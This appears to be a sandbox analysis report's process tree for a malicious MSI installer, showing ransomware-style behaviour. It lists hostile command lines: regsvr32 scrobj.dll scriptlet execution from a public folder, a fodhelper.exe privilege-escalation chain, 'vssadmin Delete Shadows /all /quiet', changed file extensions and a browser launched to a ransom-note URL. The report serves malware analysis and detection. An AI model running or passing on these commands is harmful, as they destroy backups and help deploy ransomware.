1⤵ C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
   - Suspicious use of WriteProcessMemory
  2⤵ C:\Windows\system32\regsvr32.exe | regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn
     - Modifies registry class
  2⤵ C:\Windows\system32\cmd.exe | cmd /c "start fodhelper.exe"
    3⤵ C:\Windows\system32\fodhelper.exe | fodhelper.exe
      4⤵ C:\Windows\system32\regsvr32.exe | "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
        5⤵ C:\Windows\System32\vssadmin.exe | "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
           - Interacts with shadow copies
  2⤵ C:\Windows\system32\cmd.exe | cmd /c "start fodhelper.exe"
    3⤵ C:\Windows\system32\fodhelper.exe | fodhelper.exe
      4⤵ C:\Windows\system32\regsvr32.exe | "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
        5⤵ C:\Windows\System32\vssadmin.exe | "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
           - Interacts with shadow copies
1⤵ C:\Windows\system32\msiexec.exe | msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\MAG.msi
   - Enumerates connected drives
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of FindShellTrayWindow
1⤵ C:\Windows\system32\msiexec.exe | C:\Windows\system32\msiexec.exe /V
   - Enumerates connected drives
   - Drops file in Windows directory
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of WriteProcessMemory
  2⤵ C:\Windows\system32\srtasks.exe | C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵ C:\Windows\System32\MsiExec.exe | C:\Windows\System32\MsiExec.exe -Embedding B5F14857B5BDF5100937F8735977CDBC
     - Modifies extensions of user files
     - Loads dropped DLL
     - Suspicious use of SetThreadContext
     - Suspicious behavior: EnumeratesProcesses
     - Suspicious behavior: MapViewOfSection
     - Suspicious use of WriteProcessMemory
    3⤵ C:\Windows\System32\cmd.exe | cmd /c "start microsoft-edge:http://2e80a6c8ameemybio.cryless.info/meemybio^&1^&43548853^&81^&417^&2219041
       - Suspicious use of WriteProcessMemory
      4⤵ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://2e80a6c8ameemybio.cryless.info/meemybio&1&43548853&81&417&2219041
         - Adds Run key to start application
         - Enumerates system info in registry
         - Modifies registry class
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
         - Suspicious use of FindShellTrayWindow
         - Suspicious use of WriteProcessMemory
        5⤵ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0x11c,0x120,0x40,0x124,0x7ff9211946f8,0x7ff921194708,0x7ff921194718
        5⤵ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2608 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3288 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3748 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5248 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4152 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4388 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5904 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings5⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6283d5460,0x7ff6283d5470,0x7ff6283d54806⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5904 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2668 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4960 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5900 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4884 /prefetch:25⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3588 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5484 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2640 /prefetch:85⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads